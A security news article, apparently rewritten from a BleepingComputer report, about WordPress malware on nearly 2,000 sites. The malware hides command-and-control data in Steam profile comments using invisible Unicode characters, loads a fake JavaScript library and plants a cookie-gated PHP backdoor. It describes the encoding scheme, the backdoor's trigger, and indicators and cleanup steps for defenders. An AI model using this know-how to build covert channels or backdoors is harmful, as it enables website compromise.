Approximately 2,000 WordPress websites have fallen victim to a sophisticated malware operation, which cunningly utilizes comments from Steam Community profiles to conceal its command-and-control (C2) data.
This nefarious threat actor employs invisible Unicode characters to encode a malicious payload that ultimately crafts a URL leading to a harmful script.
By exploiting Valve’s platform, the perpetrator effectively circumvents the necessity of establishing a dedicated C2 infrastructure, thereby evading conventional detection methodologies.
Since the revelation of this campaign in July 2025, cybersecurity professionals at GoDaddy have identified malware residing on nearly 1,980 WordPress sites.
The modus operandi of the hackers remains uncertain, although researchers speculate that potential vectors for initial infiltration may encompass compromised admin logins, FTP/SFTP credentials, vulnerabilities in WordPress themes or plugins, or even supply-chain intrusions.
The initial malware, once embedded within a website, utilizes page loads in WordPress to target specific Steam profiles, gleaning text from innocuous-looking comments.
Yet, this text incorporates hidden Unicode characters, which obscure the malicious payload—sometimes cleverly disguised as ASCII art.
In their analysis, GoDaddy researchers highlight that six invisible Unicode characters are instrumental in the encoded payload:
- Zero-width non-joiner (U+200C)
- Zero-width joiner (U+200D)
- Function application (U+2061)
- Invisible times (U+2062)
- Invisible separator (U+2063)
- Invisible plus (U+2064)
The decoder disregards any visible characters and associates the invisible ones with their respective numerical values; it then transforms these into a binary format, thereby reconstructing bytes from this binary stream.
“This encoding technique permits the embedding of binary data within superficially innocuous text. The visible characters act as a facade, while the invisible ones transport the malevolent payload,” GoDaddy elucidates.
Researchers assert that the decoded payload is instrumental in constructing a URL—hello-mywordl[.]info—which facilitates the injection of JavaScript code into every frontend WordPress exhibit.
Judging by the names of the files (e.g., asahi-jquery-min-bundle and lodash.core.min.js), the acquired malware masquerades as an authentic JavaScript library.
The concluding phase of the assault incorporates a backdoor that responds to meticulously crafted POST requests, contingent upon the presence of a specific authentication cookie.
If the “tEcaKKXEsb cookie is detected, the backdoor will accept base64-encoded PHP code transmitted via POST parameters,” researchers elaborate.POST request with the correct cookie
GoDaddy’s analysis outlines various evasion techniques employed by the malware, including obfuscation strategies utilizing octal and hex escapes, randomized function names, phony disabled logging code, and the strategic use of standard WordPress APIs, allowing the malware to seamlessly blend with benign activities.
Site administrators can bolster their defenses by scrutinizing references to Steam Community URLs, examining for suspicious external JavaScript inclusions, monitoring outbound connections from WordPress servers to Steam, and identifying unexpected scripts originating from domains like hello-mywordl[.]info.
Additional indicators of compromise include the presence of invisible Unicode characters, anomalous _transient_caption_ cache entries, disabled SSL verification in cURL requests, and POST requests containing the malware’s authentication cookies or the new_code parameter.
Researchers recommend that security teams prioritize recovery from a verified backup dating prior to the infection.
Should this not be feasible, a meticulous manual cleanup process is imperative, for “attackers may reinstate removed code via the backdoor if any remnants remain active.”
Source link: Bleepingcomputer.com.
